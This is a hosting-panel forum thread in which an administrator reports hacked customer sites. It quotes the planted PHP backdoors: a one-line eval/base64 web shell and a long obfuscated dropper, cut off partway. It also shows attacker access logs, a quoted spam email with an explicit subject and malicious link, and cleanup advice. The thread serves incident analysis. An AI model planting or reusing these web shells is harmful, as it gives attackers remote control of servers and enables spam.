Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2024-03-29, 14:07:37

Author Topic: [CRITICAL] Many Kloxo-MR accounts hacked !!!  (Read 7110 times)

0 Members and 1 Guest are viewing this topic.

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
[CRITICAL] Many Kloxo-MR accounts hacked !!!
« on: 2014-11-07, 17:15:38 »
We've got some customers which accounts are hacked (not via FTP, but via web, but many different scripts).

There are additional files like files.php or options.php with content like:

Quote
<?php                                                                                                                                                                                                                                                               eval(base64_decode($_POST['n6ae4d5']));?>

or

Quote
<?php $r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] = $r76[27].$r76[49].$r76[58].$r76[66].$r76[87].$r76[90].$r76[58].$r76[87]; $GLOBALS['nhnww15'] = $r76[58].$r76[41].$r76[45].$r76[7].$r76[53].$r76[23].$r76[76]; $GLOBALS['igajs32'] = $r76[41].$r76[49].$r76[87].$r76[27].$r76[27].$r76[76].$r76[76]; $GLOBALS['cpukq94'] = $r76[49].$r76[78].$r76[90].$r76[45].$r76[7].$r76[18].$r76[14]; $GLOBALS['bdonk12'] = $r76[36].$r76[43].$r76[61].$r76[96].$r76[49].$r76[18].$r76[18]; $GLOBALS['aurku4'] = $r76[53].$r76[49].$r76[20].$r76[61].$r76[49].$r76[46].$r76[15]; $GLOBALS['yqqkt30'] = $r76[7].$r76[45].$r76[58].$r76[27].$r76[87].$r76[53].$r76[49].$r76[58].$r76[54].$r76[94].$r76[20].$r76[53].$r76[66].$r76[87].$r76[66]; $GLOBALS['tnmsd36'] = $r76[78].$r76[90].$r76[53].$r76[5]; $GLOBALS['chqql44'] = $r76[90].$r76[24].$r76[78].$r76[87].$r76[20].$r76[31].$r76[46]; $GLOBALS['cvtxr40'] = $r76[94].$r76[27].$r76[69].$r76[43].$r76[66].$r76[31].$r76[52]; $GLOBALS['eavur97'] = $r76[45].$r76[66].$r76[5].$r76[94].$r76[94].$r76[41]; $GLOBALS['ptlaz26'] = $r76[45].$r76[24].$r76[70].$r76[7].$r76[45].$r76[14].$r76[18]; $GLOBALS['xcnkh30'] = $r76[20].$r76[5].$r76[5].$r76[94].$r76[35].$r76[52]; $GLOBALS['wnlxd28'] = $r76[87].$r76[24].$r76[53].$r76[78]; $GLOBALS['laepm94'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['nxseo15'] = $r76[61].$r76[94].$r76[87].$r76[36].$r76[49].$r76[66].$r76[87].$r76[96].$r76[69].$r76[58].$r76[90].$r76[78].$r76[94]; $GLOBALS['cyzbs96'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36]; $GLOBALS['yoejz48'] = $r76[24].$r76[35].$r76[94].$r76[29].$r76[61].$r76[31].$r76[15]; $GLOBALS['lzjpr73'] = $r76[43].$r76[95].$r76[87].$r76[47].$r76[7].$r76[23].$r76[18]; $GLOBALS['osnjl91'] = $r76[24].$r76[20].$r76[24].$r76[78].$r76[41].$r76[14].$r76[52]; $GLOBALS['zhjzv93'] = $r76[41].$r76[24].$r76[27].$r76[45].$r76[20].$r76[85].$r76[14]; $GLOBALS['brkww19'] = $r76[66].$r76[87].$r76[24].$r76[5].$r76[94].$r76[58]; $GLOBALS['yhcum29'] = $r76[49].$r76[69].$r76[69].$r76[66].$r76[61].$r76[18].$r76[52]; $GLOBALS['ibere91'] = $r76[7].$r76[49].$r76[7].$r76[87].$r76[61].$r76[46].$r76[14]; $GLOBALS['vszxc90'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[29].$r76[94].$r76[69].$r76[66]; $GLOBALS['qtgcq90'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[5].$r76[94].$r76[27].$r76[87]; $GLOBALS['bwpvf88'] = $r76[45].$r76[27].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]; $GLOBALS['bdvxl14'] = $r76[66].$r76[87].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['xizmx47'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[61].$r76[94].$r76[87]; $GLOBALS['stkuy98'] = $r76[70].$r76[29].$r76[90].$r76[84].$r76[84].$r76[15].$r76[18]; $GLOBALS['duiid33'] = $r76[95].$r76[90].$r76[87].$r76[94]; $GLOBALS['grxdw62'] = $r76[61].$r76[94].$r76[87].$r76[78].$r76[20].$r76[24].$r76[24]; $GLOBALS['nvuxa92'] = $r76[69].$r76[96].$r76[94].$r76[43].$r76[69].$r76[18].$r76[18]; $GLOBALS['ysmvf63'] = $r76[78].$r76[53].$r76[58]; $GLOBALS['vbhwy58'] = ${$r76[54].$r76[3].$r76[17].$r76[55].$r76[67]}; $GLOBALS['wdbfr89'] = $r76[7].$r76[94].$r76[43].$r76[7].$r76[20].$r76[85].$r76[52]; $GLOBALS['vxogc32'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[66].$r76[41].$r76[5].$r76[53].$r76[87]; $GLOBALS['inenw32'] = $r76[20].$r76[43].$r76[66].$r76[94].$r76[66].$r76[46].$r76[85]; $GLOBALS['xyxdn38'] = $r76[27].$r76[36].$r76[24]; $GLOBALS['rtdlc97'] = $r76[49].$r76[24].$r76[95]; $GLOBALS['cnrfe78'] = $r76[45].$r76[24].$r76[5].$r76[95].$r76[94].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['wzekj92'] = $r76[66].$r76[87].$r76[24].$r76[53].$r76[41].$r76[66].$r76[5].$r76[90].$r76[66].$r76[36].$r76[94].$r76[66]; $GLOBALS['yrqxp89'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[7].$r76[5].$r76[53].$r76[41]; $GLOBALS['xavtv19'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36].$r76[54].$r76[90].$r76[5].$r76[5]; $GLOBALS['zjheh80'] = $r76[96].$r76[90].$r76[66].$r76[94].$r76[23].$r76[85].$r76[54].$r76[94].$r76[58].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['gisxn89'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[24].$r76[94].$r76[90].$r76[87].$r76[94]; $GLOBALS['oqikt29'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[5].$r76[90].$r76[66].$r76[87].$r76[54].$r76[94].$r76[24].$r76[24].$

Then these files are executed remotely from different IP's:

Quote
37.139.47.122 - - [03/Nov/2014:05:15:09 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10804 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
85.143.166.99 - - [03/Nov/2014:08:32:48 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10828 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
37.139.47.122 - - [03/Nov/2014:11:56:25 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10960 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
62.76.178.9 - - [03/Nov/2014:17:00:18 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 12317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"

then our mail queue is full of messages like this (we use limit 100 per hour, but it's annoying as help, as our mial servers IP is added to DNS blocklists):

Quote
--------------
MESSAGE NUMBER 793825
 --------------
Received: (qmail 3373 invoked by uid 2513); 7 Nov 2014 11:08:54 -0000
Date: 7 Nov 2014 11:08:54 -0000
Message-ID: <20141107110854.3372.qmail@mail.xxx.pl>
To: rvkadam1980@gimail.com
Subject: Fw:  LOL =) [ShiM] - Amateur russian mom fuck with teen - www.shimeon.altervista.org
From: "Meagan Payne" <meagan_payne@plotki.klik.net.pl>
Reply-To: "Meagan Payne" <meagan_payne@plotki.klik.net.pl>
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit


<h2><a href="http://BIOSTRUCTURES.NET/wp-content/plugins/categories-images/defines.html?cHRpY2ZjbzM7OjJCZWtvY2tuLGFtbw==">[ShiM] - Amateur russian mom fuck with teen - www.shimeon.altervista.org</a></h2>
<div>the polar cap. How do you know that the artifact was taken that way?"</div>


Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #1 on: 2014-11-07, 18:17:43 »
Inform here directory of file.php.

This issue also happens in CPanel account.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #2 on: 2014-11-08, 08:13:58 »
Inform here directory of file.php.

This issue also happens in CPanel account.

Here you are:

Quote
ls -l /home/httpd/plotki.klik.net.pl/httpdocs/reklamy/lib/max/Maintenance/Forecasting/
total 20K
drwxr-xr-x 3 piotr_k2_2004 piotr_k2_2004 4.0K Dec  3  2012 AdServer
-rw-r--r-- 1 piotr_k2_2004 piotr_k2_2004 4.3K Dec  3  2012 AdServer.php
drwxr-xr-x 2 piotr_k2_2004 piotr_k2_2004 4.0K Dec  3  2012 Channel
-rw-r--r-- 1 piotr_k2_2004 piotr_k2_2004  301 Sep 18 16:31 info.php

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #3 on: 2014-11-08, 08:39:05 »
/home/httpd/<domain.com>/httpdocs just symlink for /home/<user>/<domain.com/

This symlink exists since Kloxo official. Didn't know it's importance or not.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #4 on: 2014-11-08, 09:02:42 »
For Kloxo-MR, fortunely no create this /home/httpd/<domain.com>/httpdocs. It's appear if created domain in Kloxo official and still exists if update to Kloxo-MR.

Remove this old directories with:
Code: [Select]
rm -rf /home/httpd/*/httpdocs
rm -rf /home/httpd/*/conf
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #5 on: 2014-11-08, 10:38:31 »
It does not matter. The problem is how hackers are able to inject the code via web when permissions are fine and FTP wasn't hacked.

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #6 on: 2014-11-08, 10:53:59 »
Plugin in wordpress.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline chrisf

  • Senior Master
  • **
  • Posts: 883
  • Karma: +11/-1
  • Gender: Male
  • Be the change that you wish to see in the world.
    • View Profile
    • Conviction's Hosting
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #8 on: 2014-11-09, 13:05:51 »
@Spacedust, have you found the method used to inject these files?  Was all accounts effected using wordpress?

Please inform here your investigations.  Thank you.
Christopher

Knowledge in: PHP, Perl, MySQL, Javascript, Actionscript, FLASH, HTML, CSS
Server Administrator / Developer: https://convictionshosting.com

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #9 on: 2014-11-13, 06:03:34 »
@Spacedust, have you found the method used to inject these files?  Was all accounts effected using wordpress?

Please inform here your investigations.  Thank you.

No, they were not using Wordpress but they were using OpenX.

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #10 on: 2014-11-13, 06:50:40 »
This is how they upload files !


Offline amudy17

  • Senior Member
  • *
  • Posts: 246
  • Karma: +0/-1
    • View Profile
    • Alamudy
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #11 on: 2014-12-03, 20:18:18 »
that is backdoor calling with c99 shell. i think make safe mode php to make more secure.
Free, Fast and Secure CP => Kloxo-MR
Daily News Update => Click here to see website!

 


Top 4 Global Search Engines:    Google    Bing    Baidu    Yahoo
Click Here

Page created in 0.036 seconds with 18 queries.

web stats analysis